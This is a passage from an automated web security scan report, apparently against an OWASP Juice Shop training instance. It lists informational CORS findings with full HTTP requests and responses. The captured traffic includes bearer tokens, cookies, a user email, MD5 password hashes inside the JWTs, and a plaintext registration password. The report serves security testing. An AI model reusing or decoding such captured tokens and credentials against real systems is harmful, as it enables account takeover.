    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 238
    ETag: W/"ee-53rCFb8oFsZx9n/J7+mqUA"
    Date: Sun, 15 Jan 2017 21:01:06 GMT
    Connection: close

    {"status":"success","data":{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"image":"apple_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-0
    ...[SNIP]...
    15.8. http://192.168.61.143:3000/api/Products/12
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/12

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/12?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 274
    ETag: W/"112-4pulhmzFvKNVTiwXKm5JZQ"
    Date: Sun, 15 Jan 2017 21:50:40 GMT
    Connection: close

    {"status":"success","data":{"id":12,"name":"OWASP Juice Shop Hoodie","description":"Mr. Robot-style apparel. But in black. And with logo.","price":49.99,"image":"fan_hoodie.jpg","createdAt":"2017-01-1
    ...[SNIP]...
    15.9. http://192.168.61.143:3000/api/Products/18
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/18

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/18?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 295
    ETag: W/"127-PpZkvx2Uf2P7ykEwkJBylQ"
    Date: Sun, 15 Jan 2017 21:01:11 GMT
    Connection: close

    {"status":"success","data":{"id":18,"name":"Fruit Press","description":"Fruits go in. Juice comes out. Pomace you can send back to us for recycling purposes.","price":89.99,"image":"fruit_press.jpg","
    ...[SNIP]...
    15.10. http://192.168.61.143:3000/api/Products/2
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/2

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/2?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 268
    ETag: W/"10c-hkD1i8LMM3pl/uHqcFZ3hw"
    Date: Sun, 15 Jan 2017 21:02:22 GMT
    Connection: close

    {"status":"success","data":{"id":2,"name":"Orange Juice (1000ml)","description":"Made from oranges hand-picked by Uncle Dittmeyer.","price":2.99,"image":"orange_juice.jpg","createdAt":"2017-01-15T20:5
    ...[SNIP]...
    15.11. http://192.168.61.143:3000/api/Products/4
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/4

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/4?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 273
    ETag: W/"111-kN9lwwZX7ncQdN7Gcmol2w"
    Date: Sun, 15 Jan 2017 21:50:47 GMT
    Connection: close

    {"status":"success","data":{"id":4,"name":"Raspberry Juice (1000ml)","description":"Made from blended Raspberry Pi, water and sugar.","price":4.99,"image":"raspberry_juice.jpg","createdAt":"2017-01-15
    ...[SNIP]...
    15.12. http://192.168.61.143:3000/api/Products/6
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/6

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/6?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 244
    ETag: W/"f4-TwNeU7jJ9LOASbCyrxRDhw"
    Date: Sun, 15 Jan 2017 21:01:16 GMT
    Connection: close

    {"status":"success","data":{"id":6,"name":"Banana Juice (1000ml)","description":"Monkeys love it the most.","price":1.99,"image":"banana_juice.jpg","createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"
    ...[SNIP]...
    15.13. http://192.168.61.143:3000/api/Products/7
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/7

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/7?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    X-User-Email: mike_landeck@hotmail.com
    Referer: http://192.168.61.143:3000/
    Cookie: io=UEi7oDbiwsEFhRthAAAB; email=mike_landeck%40hotmail.com; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6IjZjYjc1ZjY1MmE5YjUyNzk4ZWI2Y2YyMjAxMDU3YzczIiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTo0NDo0MS4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNjY5NCwiZXhwIjoxNDg0NTM0Njk0fQ.Y3KksxMbuL_X1cyql884FjaFA8l_XLuR08fMAijnUeg
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 243
    ETag: W/"f3-6fgy/TbTSjBKeUlhiAqA2g"
    Date: Sun, 15 Jan 2017 21:51:08 GMT
    Connection: close

    {"status":"success","data":{"id":7,"name":"OWASP Juice Shop T-Shirt","description":"Real fans wear it 24/7!","price":22.49,"image":"fan_shirt.jpg","createdAt":"2017-01-15T21:40:01.000Z","updatedAt":"2
    ...[SNIP]...
    15.14. http://192.168.61.143:3000/api/Products/8
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Products/8

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /api/Products/8?d=Sun%20Jan%2015%202017 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 483
    ETag: W/"1e3-mC3tm9U3/CQVlyF/P8fgvQ"
    Date: Sun, 15 Jan 2017 21:01:20 GMT
    Connection: close

    {"status":"success","data":{"id":8,"name":"OWASP SSL Advanced Forensic Tool (O-Saft)","description":"O-Saft is an easy to use tool to show information about SSL certificate and tests the SSL connectio
    ...[SNIP]...
    15.15. http://192.168.61.143:3000/api/Users/
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/Users/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /api/Users/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 108
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password","passwordRepeat":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 195
    ETag: W/"c3-Ld7Wb7VM2wAocUpR89IOIg"
    Date: Sun, 15 Jan 2017 21:00:53 GMT
    Connection: close

    {"status":"success","data":{"email":"mike_landeck@hotmail.com","password":"a992b1b403cba28afb428e7f5a35c516","id":7,"updatedAt":"2017-01-15T21:00:53.000Z","createdAt":"2017-01-15T21:00:53.000Z"}}
    15.16. http://192.168.61.143:3000/bower_components/angular-animate/angular-animate.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-animate/angular-animate.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-animate/angular-animate.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Fri, 16 Dec 2016 10:47:07 GMT
    ETag: W/"647a-159073e17f8"
    Content-Type: application/javascript
    Content-Length: 25722
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    AngularJS v1.5.10
    (c) 2010-2016 Google, Inc. http://angularjs.org
    License: MIT
    */
    (function(R,B){'use strict';function Da(a,b,c){if(!a)throw Ma("areq",b||"?",c||"required");return a}function Ea(
    ...[SNIP]...
    15.17. http://192.168.61.143:3000/bower_components/angular-base64/angular-base64.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-base64/angular-base64.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-base64/angular-base64.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Mon, 18 May 2015 10:39:05 GMT
    ETag: W/"16d4-14d669b0528"
    Content-Type: application/javascript
    Content-Length: 5844
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    (function() {
    'use strict';

    /*
    * Encapsulation of Nick Galbreath's base64.js library for AngularJS
    * Original notice included below
    */

    /*
    * Copyright (c) 2010 Nick Ga
    ...[SNIP]...
    15.18. http://192.168.61.143:3000/bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /bower_components/angular-bootstrap/ui-bootstrap-tpls.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Sat, 24 Sep 2016 04:17:49 GMT
    ETag: W/"1e014-1575a69d9c8"
    Content-Type: application/javascript
    Content-Length: 122900
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    /*
    * angular-ui-bootstrap
    * http://angular-ui.github.io/bootstrap/

    * Version: 2.1.4 - 2016-09-23
    * License: MIT
    */angular.module("ui.bootstrap",["ui.bootstrap.tpls","ui.bootstrap.collapse","ui.b
